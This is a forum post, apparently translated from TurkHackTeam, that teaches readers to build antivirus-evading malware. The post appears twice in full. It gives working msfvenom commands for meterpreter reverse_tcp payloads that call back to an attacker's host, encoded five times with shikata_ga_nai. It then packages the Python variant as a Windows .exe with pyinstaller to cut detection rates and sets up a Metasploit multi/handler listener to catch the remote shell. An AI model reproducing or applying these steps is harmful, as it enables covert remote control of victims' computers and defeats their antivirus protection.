Kullanıcı1233
Kıdemli Üye
- 19 Tem 2011
- 4,371
- 12
Hello TurkHackTeam family, today we gonna make an virus with "Msfvenom Encoding". Lets take a look at topics and go to the explaining.
The Topics
What is the Msfvenom?
What is the Encoder?
Encoding Process with Msfvenom
What is the Pyinstaller?
-What is the Msfvenom?-
You can make virus with msfvenom and you can do "Encoding Method" to uncaught antiviruses. Before that there are tools named msfpayload, msfencode but now msfvenom is making these process.
-What is the Encoder?-
A program/software anti-virus programs doesn't get caught in the name in the encryption process is called.
-The Encoding Process With Msfvenom-
Firstly lets take a look to parameters.
Code:
msfvenom -l
We are going to use "encoder" feature. Lets take a look to modules with:
Code:
msfvenom -l encoders
İn the incoming screen there are informations about module names, levels and descriptions.
İ'm gonna use "x86/shikata_ga_nai" encoder. Encoding operations are performed globally 1 time by default. The more you do, the less likely you are to get anti-virus, but the greater the size. 4-5 is ideal. I'll do 5. To create payload.
Code:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP_ADRESS LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > The Part Which You Want Save
And click "Enter".
Lets put to the virus scan and take a look. Yes it is pretty effective. The encoders are shows directly by the "anti-virus". For this we are making another method.
We gonna use "pyinstaller" for this. What is it?
-What is the Pyinstaller?-
Pyinstaller, gives us the opportunity to make ".exe" files by named ".py". And the anti viruses are doesn't know your virus. Lets try it!
Go to the terminal and type:
Code:
msfvenom -p python/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 -f raw > Dosya_Yolu
Lets put it on the virus scan.
As you can see the rate has fallen. But it is showing the virus in our file basicly. For this we gonna use "pyinstaller".
Go to the terminal and type it:
Code:
sudo apt-get install pyinstaller
Now we have prepare an virus named ".py" with msfvenom. But you want the ".exe" for the Windows platforms.
For this we type it:
Code:
pyinstaller --onefile python_file.py
As you can see it showed us where it saved.
Lets put it into the virus scan.
Good Job!
So if you say how we will listen to it or how we will process it, then msfconsole is our job. Let's open it in the terminal.
Code:
msfconsole
After that for the listening the payload.
Code:
use exploit/multi/handler
After that:
Code:
use exploit/multi/handler
Lets select the "show options". Here is only the IP address missing port number correctly to set it also.
Code:
set LHOST IP_adresiniz
After that for the listening our payload.
Code:
exploit
-https://giphy.com/gifs/cta98gvvk7tYERq17q-
This was the end friends, see you in the another article.
Source: https://www.turkhackteam.org/trojan...re-yakalanmayan-payload-olusturalim-p4rs.html
The Topics
What is the Msfvenom?
What is the Encoder?
Encoding Process with Msfvenom
What is the Pyinstaller?
-What is the Msfvenom?-
You can make virus with msfvenom and you can do "Encoding Method" to uncaught antiviruses. Before that there are tools named msfpayload, msfencode but now msfvenom is making these process.
-What is the Encoder?-
A program/software anti-virus programs doesn't get caught in the name in the encryption process is called.
-The Encoding Process With Msfvenom-
Firstly lets take a look to parameters.
Code:
msfvenom -l
We are going to use "encoder" feature. Lets take a look to modules with:
Code:
msfvenom -l encoders
İn the incoming screen there are informations about module names, levels and descriptions.
İ'm gonna use "x86/shikata_ga_nai" encoder. Encoding operations are performed globally 1 time by default. The more you do, the less likely you are to get anti-virus, but the greater the size. 4-5 is ideal. I'll do 5. To create payload.
Code:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP_ADRESS LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > The Part Which You Want Save
And click "Enter".
Lets put to the virus scan and take a look. Yes it is pretty effective. The encoders are shows directly by the "anti-virus". For this we are making another method.
We gonna use "pyinstaller" for this. What is it?
-What is the Pyinstaller?-
Pyinstaller, gives us the opportunity to make ".exe" files by named ".py". And the anti viruses are doesn't know your virus. Lets try it!
Go to the terminal and type:
Code:
msfvenom -p python/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 -f raw > Dosya_Yolu
Lets put it on the virus scan.
As you can see the rate has fallen. But it is showing the virus in our file basicly. For this we gonna use "pyinstaller".
Go to the terminal and type it:
Code:
sudo apt-get install pyinstaller
Now we have prepare an virus named ".py" with msfvenom. But you want the ".exe" for the Windows platforms.
For this we type it:
Code:
pyinstaller --onefile python_file.py
As you can see it showed us where it saved.
Lets put it into the virus scan.
Good Job!
So if you say how we will listen to it or how we will process it, then msfconsole is our job. Let's open it in the terminal.
Code:
msfconsole
After that for the listening the payload.
Code:
use exploit/multi/handler
After that:
Code:
use exploit/multi/handler
Lets select the "show options". Here is only the IP address missing port number correctly to set it also.
Code:
set LHOST IP_adresiniz
After that for the listening our payload.
Code:
exploit
-https://giphy.com/gifs/cta98gvvk7tYERq17q-
This was the end friends, see you in the another article.
Source: https://www.turkhackteam.org/trojan...re-yakalanmayan-payload-olusturalim-p4rs.html
Translator: Xowly
Moderatör tarafında düzenlendi: